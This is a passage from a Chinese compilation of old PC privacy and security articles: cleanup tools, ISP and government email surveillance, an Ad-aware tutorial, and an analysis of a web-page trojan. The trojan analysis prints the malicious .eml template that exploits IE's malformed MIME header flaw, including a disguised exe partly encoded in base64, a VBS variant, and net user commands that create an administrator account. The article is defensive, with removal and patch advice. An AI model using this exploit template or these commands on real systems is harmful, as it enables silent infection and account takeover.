    (F)t-z打头:Teleport Pro ,TextPad 3.x/4.x,Third Voice 1.x,ThumbsPlus 4,Ultimate Paint,VuePrint ,Webferret,WinAce Archiver 1.0,WinAmp,Windows App Log Directory,Windows Commander,Windows95/98/ME Log Files ,Windows 95/98/ME Address Book & Contacts ,Windows ME Regedit ,Windows Recent Network Drive List,Windows Web Folders ,WinRAR (All Versions) ,Winzip 7.x & 8.x,Xara 3D v4.0,Xing MP3 Player ,Yahoo! Player,Yamaha S-YXG100 ,ZipMagic,Zone Alarm from Zone Labs。

    方法二:使用超级兔子,到主界面的清除垃圾看看,有文档菜单,查找文件菜单,运行菜单,最后打开,另外保存为,搜索电脑,安装盘路径,IE历史站点,IE自动完成填充密码,NETSCAPE3历史站点,网络连接历史记录,URL历史记录文件夹,WINDOWS的画图、写字板、媒体播放器，WINZIP的解压路径、打开文件、选择文件，WPS的选择文件，ACDSEE的打开路径，REALPLAYER 6。O的打开文件，EXCEL 2000打开文件，FRONTPAGE的插入超连接、图片，就这些。还可以使用超级兔子的注册表优化，不要担心，我试过非常安全。如果把文件内容删除，在注册表中是有一些纪录(如文件名).用注册表优化可以删除这些文件名.但我认为还是WINDOWS WASHER的插件比较好.
    (七)ISP窃听:
    "加拿大北方电信公司于2001年推出了一种能够使因特网服务供应商跟踪用户在计算机网络浏览、下载等活动的软件新技术。如今，普通网络用户经常接触、也是因特网内部使用最为频繁的组成部分，万维网(WWW)已是“环球等待（World Wide Wating）”。要是获得用户在因特网上所处位置、所需信息的类别等信息，然后再由因特网服务供应商的服务器作出响应，在“后台”采取相应措施，上网速度肯定会大大加。"转自:"<<"食肉动物"在行动>> 王致诚. 如果因特网服务供应商利用新技术提供的便利收集和掌握用户个人爱好、网上商务活动的习惯之类的信息和资料，然后转手卖给其它人.ISP窃听这个我可没办法,一边撰者钱,一边出卖用户资料换钱,一举两得.别得意,可以使用加密,代理这个就不说了.如果因特网服务供应商还有越格的行为,只能实施法律制裁,秋后算账.这里警告一切因特网服务供应商,不要咎由自取,玩火自焚.
    (八)政府对网民的电子邮件极感兴趣:
    "为了监视因特网上的电子邮件，美国联邦调查局设计了一个叫 CARNIVORE（食肉动物）的软件。该软件安装在因特网服务商有关网站的服务器上，检查过往的邮件，如果发现有与美国法律相抵触的内容，软件就会自动跟踪或者截获这个邮件。这个软件被美国一些公众网、美国网民协会和一些网络论坛披露出来后，引起激烈的争论。一些网民认为这是美国政府对网络操纵干涉个人自由的一个具体例证。“食肉动物”其实一直在监视全球的电子邮件，这种计算机系统在一秒内可浏览数百万份电子邮件。对于这种有很大争议的行为美国联邦调查局公开的解释是：用它来调查黑客及反恐怖活动和追击贩毒活动。美国政府曾为它沾沾自喜： 在2000年6月，就是凭这一软件发现了一些网虫竟通过网渗透到美国联邦毒品监督局去找有关毒品的情报。而在世界上进行监督公民活动的国家也不仅是美国，如英国也通过一个法律，批准政府在网络服务商的服务器安装黑匣子以监督电子邮件。 "转自:"<<"食肉动物"在行动>> 王致诚.根据网络上一些文章可以看到X国也对臣服的网民进行类似的监控.
    (九)辐射泄漏个人资料:
    "各国企业监督员工的主要办法是利用一些专用软件，通过软件就可以发现你上班时间到底浏览了哪些网页。最新的间谍监督软件功能更加强大：你正在你的电脑前输入有关内容，在另一间办公室里的监督人员可以实时地看着你打的东西出现在他的电脑屏幕上。"转自:"<<"食肉动物"在行动>> 王致诚.
    防治方法见:金属网罩并接上深埋的地线后，能有效地屏蔽掉任何电磁辐射!显示器旁接上一个类似电视室内天线的电磁波发射装置，理论上由干扰天线发射的电磁波可以做到和显示器的辐射在同样的波段上，从而掩盖掉微机信号的辐射。但实际上，每一种CRT显示器的辐射可能是有差别的，所以使用这种干扰天线必须注意两点：一是这种干扰天线本身必须具有较宽的波段范围；二是必须对每一套配套使用的装置进行检测和调试，以使CRT和干扰天线发射的电磁波真正处于干扰状态下。<<防止电脑泄露秘密的绝招 >>作者不详.

    总之,随着技术日新月移,还会有其他的间谍方式进行搜集资料,也将更难处理.最最有效的方法是创建一个相当可靠的系统,里面是一些常用的工具,这些工具可是从来没用过.然后使用磁盘镜像工具,如:Norton的Ghost(2002),运行平台WIN9X,几分钟就可恢复原来面目,什么木马,病毒,间谍统统一边去.如果一天恢复一次,各种窥视都将付诸东流.(完)


全面清剿网络间谍檄文之一------间谍杀手

全面清剿网络间谍檄文之一------间谍杀手(lavasoftUSA.com)
作者： 电脑工程师 斩妖魔

目前有一种十分流行的编程技术，该技术叫“Aureate/Radiate's advertising ”。它被许多目前非常流行的程序所使用，通常是运行在后台，类似与寄生在浏览器中的寄生虫，有不少的软件商在软件的内部载入了Spyware，这些Spyware私自将用户的个人资料泄露。这些个人资料都包括什么内容,不得而知!
来,让Lavasoft Ad-aware解除后顾之忧。可扫描已知的多种间谍程序并能安全清除.间谍程序号称广告特络伊,秘密安装并搜集资料.特洛伊我想大家都十分清楚其危害性,但这种广告特洛伊就十分狡猾,不能被防病毒软件所查到!但有时可被防火墙截获!大家经常看到有一些程序鬼鬼祟祟的要求上网,这就有可能是广告特洛伊程序要求联结远程主机!有的时候你的邮箱有大量的广告垃圾,原因知道么,这也是广告特洛伊惹的祸,把您的信箱地址偷运出境!如果此类程序被不法分子使用,危险性也将大大增强!如果此类程序在连接主机过程中,被截获,你的个人资料也将......?!咨询邮件为:support@lavasoftUSA.com.
下面介绍两款软件:AD-aware 5.62 Plus和Ad-watch,最好两者结合使用!
一.AD-aware 5.62 Plus
版本5.0简单介绍:
1.备份,恢复非常简单
2.多语言支持
3.可快速扫描,选定的文件夹或盘.
4.可以不检测某些间谍程序.
5.新用户界面
6.可扫描移动磁盘
7.Ad-watch升级为2.0版本
软件名称：AD-aware 5.62 Plus
软件类型：共享软件
使用平台：Win9x/Me/NT/2000
软件大小：1184KB
软件开发：http://www.lavasoftusa.com/

下面是一个小例子:如何设置Ad-aware,创建备份等.该软件安装后将在开始-->程序创建一个快捷方式(桌面也有),运行该软件,在Ad-aware的主界面将显示三个不同的菜单(scan now,backups,configuratiom三项):
a.scan now,点击此项,用设置好的选项进行扫描.
b.backups,创建备份或删除备份
c.configuration,打开preferences菜单
1.设置扫描选项,当第一次运行该程序时,没有选项被设置,在左边的列表中选择让Ad-aware扫描的选项.第一次,一般选择memory-scan(内存), registry scans(注册表) and the drive (盘,一般只选择windows安装的盘).没有必要扫描所有的盘,可根据需要推荐选择.前一次的扫描设置会成为下一次的默认的设置,如果Ad-aware随windows启动时,这个设置也将被调用!但有一个例外:就是从explorer(应该是资源管理器)在文件夹或drive点右键弹出的菜单运行情况除外。在这种情况下仅仅drive\folder将被搜寻，但下一次启动的扫描设置将不被覆盖,也可再次被用.
灰色的图标表示不被选择的项,也可用选项前以"对号"选择。例如:在"My computer"前打对号,表示扫描选项为"My computer",
扫描进程可观察"summary",可时时看到检测的间谍程序个数.并且，当扫描结束的时候，会生成一个文件。不理会的项目将在"Componentes ignored" 下面被编成表，并被记录文件中被纪录，但是不进一步处理。
重要的"New components"被计数,它仅仅显示出乎意料的components。这些components也不在ignorelist列表中显示.如果扫描完成，你应该在Ad-aware产生的记录文件中看详情,点击show log。如果spyware被检测到，建议存盘以后在分析它,请在show log 菜单下选择save,存盘后,"back"按钮是返回。单击“继续”可得到全部的被检测到的components一览表（如果有的话）。
注意：使扫描中止，点击"Abort"立即回到主界界面。
假如扫描后发现了间谍程序的components,按继续也有新窗口弹出,显示检测到的详细列表。
每个一览表里的项目有三个域：
·Type : M = 模块, K = 注册表键值, V = 注册表值 和 F =文件夹
·System:间谍程序的components所属的间谍程序
·details:路径名,注册表键值等详细内容.
为了得到更多的详细内容可用鼠标点击列表中的某一个,一会就会出现一个弹出的小窗口显示详细内容。
选定所选项目,点击鼠标右键,讲弹出一个菜单任意选择有下列功能：
·Check\Uncheck,选择所有或全不选择。
·Jump to key－如果RegHance 2.0已安装或以后按装后，你能用Jump to key直接跳到注册表的该项键值表中。
·export RegHancebookmarkfile,导出RegHance类型文件
· Show properties,显示所选文件的属性。
·Move sel.items to ignorelist,把所选项目发送到ignorelist
·Backup selected items ，把所选的项目备份。
·Continue－继续清洁系统，所选的全部项目都将被移出。
注：该软件屏幕底部有3个按钮分别是Backup,Exclude 和 Continue,根据需要选择。在这三个按钮的左侧显示的是xx个间谍项目被发现。
·Exclude,把所选项目发送到ignorelist文件中。
·Backup,备份所选的项目,自己指定文件名和路径，一般建议选择。
·Continue－继续清洁系统，所选的全部项目都将被移出。
为了能用RegHance打开选定的注册表值，必须指定在configuration---->paths给出RegHance安装文件夹。
你想不理会某些项目，请选定不理会的项目，然后点击“"exclude"(拒绝的意思) 钮。这样选定的项目将从结果列表中移出。
最后选择你想要清除的项目来，点击"continue"键,Ad-aware软件将清除所选的项目清除。值得注意的是:所有的项目必须是重新启动后,才能被清除.
2. 从备份重新安装项目。如果想反安装已被删除的项目,在主界面上选择"backup"，单击后进入就会看到备份文件。选择备份文件后,单击"Restore"按钮,进行恢复。在"Restore"按钮的右侧是"clean"按钮,是删除备份文件.执行完,单击"ok",返回到主界面 ! 也可以通过选定备份文件点击鼠标右键,弹出菜单中选择"restore this backup"或"delete"!
注意：当开始的时候，Ad-aware将扫描备份文件夹,如果通过主界面的configurtation菜单改变备份路径,您也必须把备分文件拷贝到新的备份目录下。
3。编辑“Ignorelist”,有时希望系统保留特别的间谍程序,也不希望Ad-aware把所有的间谍项目进行一变又一变的检测,就需要对主界面下的你在configuration-->ignorelist下面的ignorelist进行配置。
当你第一次运行Ad-aware,ignorelist列表是空的。如何把不需要理会的项目加进此列表中呢?请看下面几步：
第1,扫描您的系统。一直到有列表出来.
第2,在列表中选定所有您想不理会的项目,然后点击"exclude" 按钮.
第3,回头看看configuration-->ignorelist的列表,看看是不是有不需要理会的列表了.注意:不要让在自动模式下运行Ad-aware.
不理的项目将被编入带评述的记录文件，在扫描期间里不进行处理。
如何从列表中清除项目呢?选定(鼠标右键(checked(选择)或unchecked(不选择),也可用鼠标在此项目前的框内达格对号)后,单击"remove checked items" 按钮.
注：Ad-aware和Ad-watch共同拥有一个ignorelist（或者是referencefile）。ignorelist将在Ad-aware安装文件夹内被保存.

4。设置Ad-aware
安装之后，有必要定制Ad-aware。在主菜单，单击"Configuration"钮。有一般选项（general options）和附加选项（Additional options ）。
（1）General Options(一般任意选择)，在"Configuration"--〉options。在这里你能设一些基本选择，和指定被使用的语言。按 "cancel"不保存设置，保存设置请按"proceed"。ignorelist是唯一例外的，任何变化都将保存在磁盘中。
简单说明：
a.Mark all references found by default
如果被设置'，全部结果一览表里的项目都将在后一定要删除。也就是默认选定了所有的已检测到的间谍程序。可以用上面提到的手工检查，或者清除对他们的选定。
b.Scan on Windows startup,如果被设置，Ad-aware将随windows启动而启动。个人看法,建议开机自动运行Ad-aware.
c.Safe mode (always ask confirmation),安全模式（总是问确认）,选择这项后,Ad-aware所作任何行动都将要求确认。高度建议选择此项。
d.Automatically remove all references found(自动清除所有已发现的参照)。建议不使用，因为有些标准一般用户是无法判断的。
这是重要选项，除非你肯定地确定清除任何Ad-aware承认的参照，否则不要使用它。如果被设置，Ad-aware将自动清除任何参照。全部活动都将写进记录文件。如果你使用这特点，我们也非常推荐使用'Auto save log file' 。
重要：如果Ad-aware察觉Web3000被安装，代替Wsock32.dll，Web3000参照将不自动被除掉。
e.Auto save log file
如果你每次都希望Ad-aware自动保存记录文件,请选择此项.这样与扫描结果无关的内容也将被写进纪录。
如果Ad-aware没有检测参照，记录文件将扫描后后保存或者在清除过程后存盘。你在下边输入的路径名进入，如果该路径不存在将被创建或者选择一个可写的共享文件夹.
f.语言：
Ad-aware在ad-aware\Lang的文件夹中寻找语言模数。他们将在这在改变语言的list.After中被展览单击继使新设定活化。其他的不介绍。
（2）Additional Optionen，
下面的选项主要在Additional Optionen的plus options中。
A：plus options
a.Add "Scan with Ad-aware" to explorer context menu,如果这项被选，在文件夹或drive(如:c;a:)鼠标右击出现 "Scan with Ad-aware"。
b.Automatically remove files in use after rebooting
重新起机后将自动清除这些文件,没有必要重新起机后再进行扫描.
c.Hide splashcreen at startup,在启动时,装载Ad-aware时,允许关掉Ad-aware的主界面。
d.Play alarm sound if spyware was found,当有间谍程序被发现时将有声音告警.
B：下面是纪录文件的纪录等级，在logfile detaillevel下：
a.Include additional process information,显示一些有关细节信息,比如什么时间创建了什么,或者一些优先度的信息.
b.Include additional file information,包括补充性的文件信息。
建议这两项全部选择是记录更清楚。
C： Total spyware components removed,显示您的系统有多少间谍软件被清除!单击橡皮图标清除所有间谍程序。
(3) configration-->paths该项是一些文件路径如:logfile(记录文件),ref.file,reghance,wave-file(告警文件),backups(备份文件).
5。命令行参数
用命令行参数运行Ad-aware时非常有用的,一般情况下Ad-aware的默认文件名为ad-aware.exe。
支持下列指令：
/auto=自动运行adaware,ad-aware将自动搜寻，除掉任何间谍程序。建议和/log参数一起使用。
/hide=最小化方式,扫描期间Ad-aware不弹出来。自动的方式也使用这个参数。
/log (destination) = 存盘路径.
如:/log C:\Temp,将把记录文件保管在C ： \Temp文件夹——在文件名中包括扫描的日期和时间。如果没有指定的文件夹或文件夹无效(原因自己不能创建新的文件夹),此文件保存在ad-aware文件夹(ad-aware安装文件夹)!
/full=完全扫描方式,如果这参数被使用，Ad-aware将搜寻内存，注册表和已知安装的硬盘.
例子：ad-aware.exe /auto /hide /log,Ad-aware将让最小化,自动方式的，自动储备记录文件。
我想这在批处理文件中是和很好的。
重要一点：如果Ad-aware察觉那个Web3000已经被安装了，并且代替的Wsock32.dll,将不能把Web3000自动清除。(原文:If Ad-aware detects that Web3000 has been installed, and replaced Wsock32.dll,no Web3000 references will be removed automatically.)
6。多语言模式，Ad-aware 5.0支持固定格式的语言模式。
为了增加自己的模数，请跟着这些步：在Ad-aware被安装的文件夹中，打开"\Lang"文件夹，使“english.ini”拷贝成你想加的语言。（例如:italian模数“italian.ini”,别请改变文件扩展，它肯定一直是.ini)。详细见帮助.
二.介绍Ad-watch
Ad-watch是包括Ad-aware在内,能时时监测间谍程序。Ad-watch是在后台上运行,监测安装或修改您的系统的间谍软件.
当Ad-aware监测或清除您的系统中已知的间谍，使你的系统干净的时候，Ad-watch能在您的系统进一步捕捉类似WebHancer的spyware。如果察觉有间谍软件，Ad-aware将突然弹出，放下特别的模数，着手进行Ad-aware。
你能在优先菜单中改变优先菜单。全部活动都将在输出窗口上被纪录.Ad-aware能随windows自动启动,并最小化。双击托盘-图标，或者用托盘-菜单来返回纪录窗口.这例子中（AudioGalaxy安装期间）Webhancer安装模数被承认，立即被放下。当Ad-watch 运行并且处于活动状态的时候，安装Webhancer寄生虫是不可能。甚至在安装前就能杀掉间谍程序.如果你更新Ad-aware，Ad-watch将同时被更新。
打开主菜单，单击"OPTION"或点鼠标右键弹出窗内部单击“OPTION”标记。
菜单项目
1.状态(Status)这项目用来监视系统临时文件。Ad-watch占用CPU资源很小，但是，在某种情况下，你需要对系统临时文件进行监视和记录。这样把Ad-watch设成睡眠方式。2.Auto scroll,切换输出纪录文件的方式(打开或关闭)假如你想读到输出的内容，建议关掉这个临时文件的开关。3.Preferences(优先)打开Preferences菜单,开始Ad-aware,Ad-aware将以设定有限方式开始.4.Clear log(清除纪录)全部清除输出纪录，并且复位输出窗口。5.Export log(导出纪录)用磁盘保存记录文件（就是输出窗正文）。6.About,显示版本和构造数字
注：如果点击鼠标右键,这个菜单是可见的!
2.Setting up Ad-watch,在main menu item下面或者用右键点击Ad-watch托盘图标可看到preferences菜单!单击"proceed",设置将被存储,然后点击关闭(close )按钮!"Default Settings"是默认设置,对设置不进行保存!
优先菜单(preferences menu)的描述如下:
1.优先的程度(Priority)(high normal or low)
任意选择二者(更新频率,任务优先程度)进行控制!
大多数情况建议normal!
a.Auto start Adwatch,此项是随windows启动自动调用Ad-watch,并且Ad-watch将最小化!
b.Force unloading
如果被选择，任何已承认模数都将被强行unloading。如果你不想让你已知的广告接近您的系统,你应该选择这个项目。如果Ad-aware开始已被设置，模数将首先被放下，接着Ad-aware将被启动。
c.Auto pop up,Ad-watch一般是最小化的,如有告警发生时,强制弹出Ad-watch项目!或者托盘图标将变为一闪一闪的红色。双击他或者选择菜单中的"restore"返回到输出窗!
d.Launch Ad-aware
如果选择此项，当察觉有间谍程序的时候，Ad-aware将被启动。Ad-watch将一直等到Ad-aware关毕.
e.Automatic mode(自动方式),当Ad-aware被实行的时候，Ad-watch将开始自动的审视和排除!
f.Remove bad cookies(删除坏的cookies)如果被选择，检测到追踪cookies将自动被清除掉。
g.Always on top(总是顶端上)
如果被选择，输出窗将在其他窗口的顶端。
h.Snap to borders把Ad-watch 窗口拖到桌面边界讲发出“劈啪地响”。（很像Winamp）。
g.Appearance,选择输出窗口的版面.


临时文件不留痕迹

临时文件不留痕迹

临时文件不留痕迹
在Windows95/98上可以在内存上划分一块创建虚拟硬盘，把要做的文件复制到虚拟硬盘上，因为文件是放在内存上，所以只要一断电所有信息全部消失。

方法：在C盘根目录下编辑config.sys文件，加入以下命令
DEVICE=C:\WINDOWS\RAMDRIVE.SYS xxxx/E

其中WINDOWS为操作系统所在目录，后面的xxxx表示虚拟硬盘的空间为xxxxKB。

注意：如在config.sys中有himem.sys和emm386.exe文件，一定要把命令加到他们的下边。同时虚拟硬盘不支持长文件名。

启动后在资源流览器中会看到多了一个硬盘(如：X:)。这样就可以将临时文件放在该盘上了。


浏览网页也会感染木马

如果我对你说浏览网页也会感染木马，你相信吗？

    其实，这已经不是相信不相信的问题了，在半年前就有人使用这种技术来使人中招了！最近听说有人在浏览某个网站时中招，因此去那里看了看，在网页打开的过程中，鼠标奇怪的变成沙漏形状，看来的确是有程序在运行。打开计算机的任务管理器，可以看到多了一个wincfg.exe的进程。进程对应的文件在win2000下是c:\winnt\wincfg.exe，在win98下为c:\windows\wincfg.exe。运行注册表编辑器regedit，在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run发现wincfg.exe，哈哈，原来它将自己登记在注册表开机启动项中，这样每次开机都会自动运行wincfg.exe！
    注：给你下套的人可以自己设定这个木马的启动键名和注册文件名，注册文件名也就是运行时进程里的名称，因此大家看到的结果可能不相同。

    运行金山毒霸，报告发现“backdoor bnlite”，哦，原来是木马bnlite服务端改名为wincfg.exe。别看这个木马服务端程序不大（只有6.5K），但它的功能可不少：具有ICQ通报功能、远程删除服务端功能、设定端口和运行名称、IP报信（报告服务端所在的IP地址）、上传下载……如果你中了该木马，那么木马控制端所在完全可以通过这个木马在你的电脑上建立一个隐藏的ftp服务，这样别人就有全部权限进入你的电脑了！控制你的电脑将非常容易！

    让我感兴趣的是，木马是如何下载到浏览了该主页的用户的计算机中、并运行起来的。在IE中点击“工具”→“Internet选项”→“安全”→“自定义安全级别”，将ActiveX相关选项全部都禁用，再浏览该网页，wincfg.exe还是下载并运行了！看来和ActiveX无关。在“自定义安全级别”中有关文件下载的选项都禁止，再浏览该网页，哈哈！这回wincfg.exe不再下载了。

    我们来看看wincfg.exe是如何下载到浏览者计算机上的，在该网页上点击鼠标右键，选择其中的“查看源代码”，在网页代码最后面发现了可疑的一句：
IFRAME src="wincfg.eml" width=1 height=1

    注意到其中的“wincfg.eml”了吗？大家都知道eml为邮件格式，网页中要eml文件干什么呢？非常可疑！再次浏览该网页，再看看任务管理器，wincfg.exe进程又回来了，原来问题就在这个文件上！既然问题在这文件上，当然想办法搞到这个文件看看了。用蚂蚁把文件下载下来，鼠标刚点上去，wincfg.exe又被执行了，真是阴魂不散啊！

    打开a.eml，发现其内容如下：

From: "xxx" br>To: "xxx" br>Subject: xxxx
Date: Tue, 7 Apr 2001 15:16:57 +800
MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="1"
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1

--1
Content-Type: multipart/alternative;
boundary="2"

--2
Content-Type: text/html;
charset="gb2312"
Content-Transfer-Encoding: quoted-printable

HTML>
HEAD>
/HEAD>
BODY bgColor=3D#ffffff>
iframe src=3Dcid:THE-CID height=3D0 width=3D0>

/BODY>

--2--

--1
Content-Type: audio/x-wav;
name="wincfg.exe"
Content-Transfer-Encoding: base64
Content-ID: < p>

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4
gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAIh3BDsAAAAAAAAAAOAADwELAQQUAC
AAAAAQAAAAkAAAIL0AAACgAAAAwAAAAABAAAAQAAAAAgAABAAAAAEAAAAEAAAAAAAAAADQA
AAAEAAAAAA……(以下删掉一大节)

--1

    你看到的类似“TVqQAAMAAAAEAAAA//8AAL”这样的字符，就是wincfg.exe经过base64编码的内容。上面这些代码中，关键的是下面这一段：

Content-Type: audio/x-wav;
name="wincfg.exe"
Content-Transfer-Encoding: base64
Content-ID: < p>

    其中，name="wincfg.exe"这一句定义了文件名称，在此为wincfg.exe。 而这一句：Content-Transfer-Encoding: base64则定义了代码格式为base64。

    从这句Content-ID: 开始才是代码的起步，“TVqQAAMAAAAEAAAA//8AAL”等为wincfg.exe文件的BASE64方式编码，这个以BASE64方式编码的文件会反编译成wincfg.exe文件并运行。这就是浏览该网页会中木马的原因！到此我就明白了，其实，所谓的浏览网页会中木马，只是网页制作者利用了微软IE浏览器中存在的漏洞进行攻击的一个案例而已，说白了就是利用了错误的MIME头进行攻击。

    1.MIME简介
    MIME(Multipurpose Internet Mail Extentions)，一般译作“多用途的网际邮件扩充协议”。顾名思义，它可以传送多媒体文件，在一封电子邮件中附加各种格式文件一起送出。现在它已经演化成一种指定文件类型(Internet的任何形式的消息：e-mail，usenet新闻和Web)的通用方法。在使用CGI程序时你可能接触过MIME类型，其中有一行叫作Content-type的语句，它用来指明传递的就是MIME类型的文件(如text/html或text/plain)。

    2.错误的MIME头漏洞的发现
    该漏洞是由一个国外安全小组发现的，该小组发现在MIME在处理不正常的MIME类型时存在个问题，攻击者可以创建一个Html格式的E-mail，该E-mail的附件为可执行文件，通过修改MIME头，使IE不正确处理这个MIME所指定的可执行文件附件。在此，我们来了解一下，IE是如何处理附件的：一般情况下如果附件是文本文件，IE会读它，如果是VIDEO CLIP，IE会查看它；如果附件是图形文件，IE就会显示它；如果附件是一个EXE文件呢？IE会提示用户是否执行！但令人恐惧的是，当攻击者更改MIME类型后，IE就不再提示用户是否执行而直接运行该附件！从而使攻击者加在附件中的程序、攻击命令能够按照攻击者设想的情况进行。大家不妨想像一下，如果前面提到的wincfg.exe不是木马，而是恶意程序江民炸弹又会怎么样？刹那间，你的硬盘就完蛋了(如果你不懂解法的话)！在Win9X\ME以及WinNT4和Win2k下的Internet Explorer 5.0、5.01、5.5均存在该漏洞，我们常用的微软邮件客户端软件Outlook Express也存在此漏洞。

    3.错误的MIME头漏洞的危害
    让我们来看一下如果把上面所说的代码中最后这部分变为下面这样，会产生什么结果呢？

--1
Content-Type: audio/x-wav;
name="hello.vbs"
Content-Transfer-Encoding: quoted-printable
Content-ID: < p>

msgbox("你的计算机好危险哦") 说明：在此可以加上任意的VBS的代码

--1

    将该程序编辑存为eml格式的文件，我们运行它，可以看到屏幕上打开一个窗体，显示“你的计算机好危险哦”。对于这种利用错误的MIME头漏调用VBS文件的形式，会有多大危害呢？想一想，当初的爱虫病毒是怎么样的？爱虫病毒还需要骗你执行它才使你中毒，但一旦和错误MIME头漏洞结合起来，就根本不需要你执行了，只要你收了这封信且阅读它，你就中招了。

    不仅如此，MIME还可以与command、cmd命令相结合，进行进一步的攻击。

    对于WIN9X用户来说，只要你的IE浏览器是5.0、5.01、5.5之中的任意一个版本，在没打补丁的情况下，攻击者完全可以利用欺骗的方式让你打开含有攻击命令的、带有错误MIME头的E-mail文件，达到攻击的目的。事实上，format、deletetree、move等一切MS-DOS下的命令均可加载在其中。

    而对于WINNT、WIN2K用户，尤其是那些不安分守己且网络安全知识贫乏的系统管理员，利用公司的主服务器上网，攻击者可以给他发封信，然后利用在以上所示代码中加上诸如：
net user test 1234567/add
net localgroup administrators test/add
这样的命令增加用户或者超级用户权限，达到进一步入侵的目的。

    现在，再回过头来看看我所中的木马是怎么回事。其实，wincfg.exe这个文件在这里相当于邮件的附件，从我们所列的代码中可以看到，攻击者把wincfg.exe的的类型定义为audio/x-wav，由于邮件的类型为audio/x-wav时，IE存在的这个错误的MIME头漏洞会将附件认为是音频文件自动尝试打开，结果导致邮件文件a.eml中的附件wincfg.exe被执行。在win2000下，即使是用鼠标点击下载下来的a.eml，或是拷贝粘贴该文件，都会导致a.eml中的附件被运行，微软的这个漏洞可真是害人不浅啊。现在看来，原先那些攻击者想方设法欺骗被攻击目标执行修改过的木马等后门程序，是多么落后的手段啊！如今，利用微软“创造”的这个大漏洞来进行攻击，是那么的简单、多么的容易啊！唯一的条件就是被攻击目标使用IE5.0、5.01、5.5这些浏览器中的一种，使用IE浏览器的用户到底有多少呢？看看你身边的朋友就知道答案了！

    解决办法：

    如果你浏览网页中了该木马，可以用下面的方法来加以解决：

    (1)点击“开始”→“运行”，在弹出的对话框中输入regedit，回车。然后展开注册表到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run下删除wincfg.exe；
    (2)到你的计算机的系统目录下，如果操作系统是Win2000，则到c:\winnt下；如果你的操作系统为Win98，则到c:\windows下，删除其中的wincfg.exe 文件。
    (3)重新启动机器，一切OK了！

    预防方法：

    1.最好的办法是不使用IE和Outlook。可以用Netscape代替IE，用Foxmail代替Outlook。如果非要用，建议你按下面的方法进行操作：

    (1)运行IE，点击“工具→Internet选项→安全→Internet区域的安全级别”，把安全极别由“中”改为“高”。
    (2)接着，点击“自定义级别”按钮，在弹出的窗口中，禁用“对标记为可安全执行脚本的ActiveX控件执行脚本”选项。
    (3)同理，在此窗口中禁用IE的“活动脚本”和“文件下载”功能。
    (4)禁用所有的ActiveX控制和插件。
    (5)设置资源管理器成“始终显示扩展名”。
    (6)禁止以WEB方式使用资源管理器。
    (7)取消“下载后确认打开”这种扩展名属性设置。
    (8)永远不直接从IE浏览器中选择打开文件。

    2.不要受陌生人的诱惑打开别人给你的RUL，如果确实想看，可以通过一些下载工具把页面下载下来，然后用记事本等一些文本编辑工具打开查看代码。

    3.微软公司为该漏洞提供了一个补丁，赶快到下面所列出的URL去看看吧：
http://www.microsoft.com/windows/ie/download/critical/
Q290108/default.asp


网络安全的基础常识介绍

▲如果你是一个新手，你该从哪里开始呢？

你也许正在你的长椅上虚度光阴，用你那计算机在最大和最有名的那些网站上冲浪；你也带一些工作回家来做；时不时的，你会打开一个邮件程序来打理一下你跟客户之间的电子邮件。但是，你可能没有发现，你的家庭电脑可能已经成为黑客任意遨游的港湾。如果那个黑客是为你的竞争对手服务的，你很可能已经泄露了你的客户清单，你还损失了什么？那只有老天才知道。如果你来到我们的网站(http://sky.net.cn)是用在线检测系统对你的电脑做一个简单的测试。你会发现，要闯入大部分人的电脑实在是太容易了，即使是一个小孩子也可以做到。因为许多人的电脑都是门户大开，对这个星球上的所有访客都来者不拒。你让他们任意地在你的系统里散步，随便翻阅那些最令你骄傲和最令你尴尬的信息。

也许，你说你不想给你的对手送上你客户的数据库，或把你热情的电子邮件发给在街头玩耍的十三岁孩童？这还是有希望的，我将告诉你别人是如何进入你的电脑的，而你可做些什么来把他们挡在门外。首先，让我们假设那些想进入你电脑的人不是电脑科学家，也不是高超的电脑罪犯。告诉你如何对付高级的电脑犯罪需要写整整一本书。我要说的是一些你偶然会做的事，它们会让一个竞争对手、未授权者或者少年黑客进入你的电脑,复制，损坏或摧毁你机上的任何东西。现在,我们来研究一下那些不速之客是如何找到你的漏洞的。

对于你的家庭电脑而言：如果你把工作带回家，又有使用电子邮件，浏览网页，或享受其他各种各样的网络服务，你的机子就危险了。你不需要在上网时把你想保密的东西打开，你只要把他们存在机上的某个地方，而你的调制解调器又开着，这就够麻烦的了。

对于你的工作电脑而言：工作时你可能使用局域网（LAN）。如果它没有跟外界有任何的联系，那对你是好的，你不需要担心别人（除了你的同事）偷窥你的信息。但那样你的网络将不能发挥它的最大效用。你几乎一定会连上国际互联网来使用电子邮件，只要你的局域网联上国际互联网，你公司的电脑就会给入侵者以可乘之机。

▲以下是你的电脑可能被入侵的七种最简单的方式：

1）Modem

你是否试过在一个遥远的地方和你机上的modem连上，并用拨号的方式登录你的机子？当你旅行的时候，这为你用膝上型电脑联系你的家庭电脑或工作电脑提供了极大的方便。不幸的是，有一些叫“war dialers”的免费软件在搜索可用电话线连接的电脑，并尝试去猜测密码。 在国外很多地方，运行程序来一个一个拨号搜索modem是违法的。但是，如果你的工作电话号码是999-9998而你的modem号码是999-9999呢？如果一个窥探者拨了这个号码，modem回应了呢？如果你没有设密码，或你的密码会被war dialers程序从字典或电话本上查到呢? 窥探者会一边说“谢谢”，一边下载你不小心公之于众的数据库。

如何解决这个问题：你可以运行一些程序来挡住入侵者，这些程序使你的远程电脑先被你暂停，再向你当地的电脑回拨。PC Anywhere是远程控制你的计算机的好工具—如果用得好的话。“Back Orifice”是一个可怕的恶梦—请看以后的解释。 你说你从不向家里的电脑拨号？那并不说明你是安全的。试试向你的电脑拨号，看它有没有响应。如果有，关掉它的响应功能。如何实施要看你的modem和拨号软件。Windows NT可以很容易的关掉modem的电话响应功能。

2）猜测你那个简单的密码。

